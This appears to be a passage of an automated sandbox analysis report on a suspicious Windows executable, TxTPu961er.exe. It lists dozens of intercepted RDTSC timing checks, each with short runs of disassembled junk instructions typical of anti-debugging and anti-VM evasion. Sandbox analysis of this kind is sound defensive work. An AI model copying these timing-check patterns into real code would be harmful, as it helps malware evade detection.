Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 761223 second address: 761227 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 76876E second address: 76878B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7905006519h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 768ABA second address: 768AC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 768AC6 second address: 768ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 768ACA second address: 768AD0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 775563 second address: 77558E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7905006519h 0x00000007 jno 00007F7905006506h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jbe 00007F790500650Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7774F3 second address: 777500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F7905119FB6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 777500 second address: 777504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7798A2 second address: 7798DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7905119FC9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d jp 00007F7905119FC5h 0x00000013 jmp 00007F7905119FBFh 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7897A1 second address: 7897A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 78964C second address: 789652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 78D60D second address: 78D613 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 78D613 second address: 78D617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 78D617 second address: 78D63B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7905006506h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jns 00007F7905006506h 0x00000013 pop esi 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jl 00007F7905006531h 0x0000001c push eax 0x0000001d push edx 0x0000001e ja 00007F7905006506h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 792D7A second address: 792D82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 792D82 second address: 792D8C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7905006506h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 792D8C second address: 792D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7915E6 second address: 791612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push esi 0x00000006 pop esi 0x00000007 jmp 00007F7905006513h 0x0000000c jmp 00007F790500650Eh 0x00000011 popad 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7918C1 second address: 7918CB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7905119FB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7918CB second address: 7918E4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7905006514h 0x00000008 jmp 00007F790500650Eh 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 791A63 second address: 791A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 792A4B second address: 792A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 jl 00007F7905006506h 0x0000000c jmp 00007F7905006512h 0x00000011 pop ecx 0x00000012 jc 00007F7905006514h 0x00000018 jmp 00007F790500650Eh 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 ja 00007F7905006519h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 792A89 second address: 792AAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7905119FBDh 0x00000009 jmp 00007F7905119FC3h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 792AAD second address: 792AB7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F790500650Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7A3CDA second address: 7A3CF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7905119FB6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d pop ebx 0x0000000e jg 00007F7905119FCAh 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7A3CF4 second address: 7A3CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7A0A5F second address: 7A0A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7A0A64 second address: 7A0AA3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jbe 00007F7905006506h 0x00000009 pop edi 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop edx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F790500650Eh 0x00000016 jmp 00007F790500650Fh 0x0000001b jmp 00007F790500650Dh 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 pop eax 0x00000024 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7B2CE5 second address: 7B2CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7B2CEB second address: 7B2CEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7B444C second address: 7B4485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7905119FB6h 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f jmp 00007F7905119FBBh 0x00000014 jmp 00007F7905119FBEh 0x00000019 pop esi 0x0000001a jmp 00007F7905119FC0h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7B6DDE second address: 7B6E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7905006519h 0x00000009 popad 0x0000000a jg 00007F7905006512h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7D01FF second address: 7D0210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7905119FBBh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7CF0AF second address: 7CF0BB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jo 00007F7905006506h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7CF0BB second address: 7CF0C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7CF0C0 second address: 7CF0ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7905006506h 0x0000000a pushad 0x0000000b popad 0x0000000c jbe 00007F7905006506h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jns 00007F7905006516h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7CF0ED second address: 7CF0F7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7905119FBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7CF54A second address: 7CF54E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7CF54E second address: 7CF554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7CF692 second address: 7CF698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7CF698 second address: 7CF6BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7905119FB6h 0x0000000a popad 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7905119FC6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7CFB1B second address: 7CFB20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7CFC96 second address: 7CFCA0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F7905119FC2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7D6EC1 second address: 7D6EC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7D8CB6 second address: 7D8CF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7905119FC4h 0x00000009 push eax 0x0000000a jmp 00007F7905119FC9h 0x0000000f pop eax 0x00000010 popad 0x00000011 jnp 00007F7905119FD2h 0x00000017 push eax 0x00000018 push esi 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49E0C6E second address: 49E0C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49E0C72 second address: 49E0C78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49E0C78 second address: 49E0C87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F790500650Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49E0C87 second address: 49E0C96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49E0C96 second address: 49E0C9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49E0C9A second address: 49E0CA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49E0CA0 second address: 49E0CA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49E0CA6 second address: 49E0CAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49E0CAA second address: 49E0CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F7905006519h 0x00000014 or cl, FFFFFFA6h 0x00000017 jmp 00007F7905006511h 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A1069E second address: 4A106A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A106A2 second address: 4A106A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A106A8 second address: 4A106AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A106AE second address: 4A106B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A106B2 second address: 4A106DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a jmp 00007F7905119FBEh 0x0000000f call 00007F7905119FC2h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A106DE second address: 4A107CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F790500650Eh 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e call 00007F790500650Eh 0x00000013 pushfd 0x00000014 jmp 00007F7905006512h 0x00000019 add si, 1098h 0x0000001e jmp 00007F790500650Bh 0x00000023 popfd 0x00000024 pop eax 0x00000025 pushfd 0x00000026 jmp 00007F7905006519h 0x0000002b and si, F636h 0x00000030 jmp 00007F7905006511h 0x00000035 popfd 0x00000036 popad 0x00000037 mov ebp, esp 0x00000039 pushad 0x0000003a mov ebx, eax 0x0000003c call 00007F7905006518h 0x00000041 pushfd 0x00000042 jmp 00007F7905006512h 0x00000047 sub si, 1FB8h 0x0000004c jmp 00007F790500650Bh 0x00000051 popfd 0x00000052 pop eax 0x00000053 popad 0x00000054 pop ebp 0x00000055 pushad 0x00000056 push eax 0x00000057 push edx 0x00000058 pushfd 0x00000059 jmp 00007F790500650Bh 0x0000005e sub al, 0000007Eh 0x00000061 jmp 00007F7905006519h 0x00000066 popfd 0x00000067 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49B00CB second address: 49B00D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49B00D0 second address: 49B00DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49B00DD second address: 49B00E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49B00E3 second address: 49B00E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49B00E8 second address: 49B00FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7905119FC3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49B00FF second address: 49B0103 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49B0103 second address: 49B013A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F7905119FC4h 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F7905119FC0h 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 mov si, D7E3h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49B01AA second address: 49B01BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F790500650Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49D0A05 second address: 49D0A18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7905119FBFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49D0A18 second address: 49D0A2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F790500650Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49D0A2E second address: 49D0A33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49D0A33 second address: 49D0A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49D0A39 second address: 49D0A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7905119FBCh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49D0A4F second address: 49D0AB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F790500650Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F790500650Bh 0x00000014 sbb cx, EE2Eh 0x00000019 jmp 00007F7905006519h 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F7905006510h 0x00000025 jmp 00007F7905006515h 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49D0AB6 second address: 49D0AE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 mov dx, cx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 call 00007F7905119FC7h 0x00000015 pop esi 0x00000016 mov ch, bh 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49D0610 second address: 49D062B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7905006517h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49D062B second address: 49D067D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 mov ebx, 08898536h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f jmp 00007F7905119FBDh 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov ecx, edi 0x0000001a pushfd 0x0000001b jmp 00007F7905119FBFh 0x00000020 sbb ax, 226Eh 0x00000025 jmp 00007F7905119FC9h 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49D0517 second address: 49D051D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49D051D second address: 49D0524 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49D0524 second address: 49D0542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7905006514h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49D02B0 second address: 49D02BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7905119FBBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49D02BF second address: 49D02C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49D02C3 second address: 49D02D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49D02D2 second address: 49D02D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49D02D6 second address: 49D02DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49D02DC second address: 49D034D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, ch 0x00000005 push edx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebp 0x0000000d jmp 00007F7905006513h 0x00000012 mov ebp, esp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F790500650Bh 0x0000001d or ax, EC2Eh 0x00000022 jmp 00007F7905006519h 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007F7905006510h 0x0000002e adc al, FFFFFFA8h 0x00000031 jmp 00007F790500650Bh 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49D034D second address: 49D037A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7905119FC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7905119FBDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49D037A second address: 49D0380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49D0F78 second address: 49D0F7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A1058D second address: 4A1059D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F790500650Ch 0x00000009 rdtsc
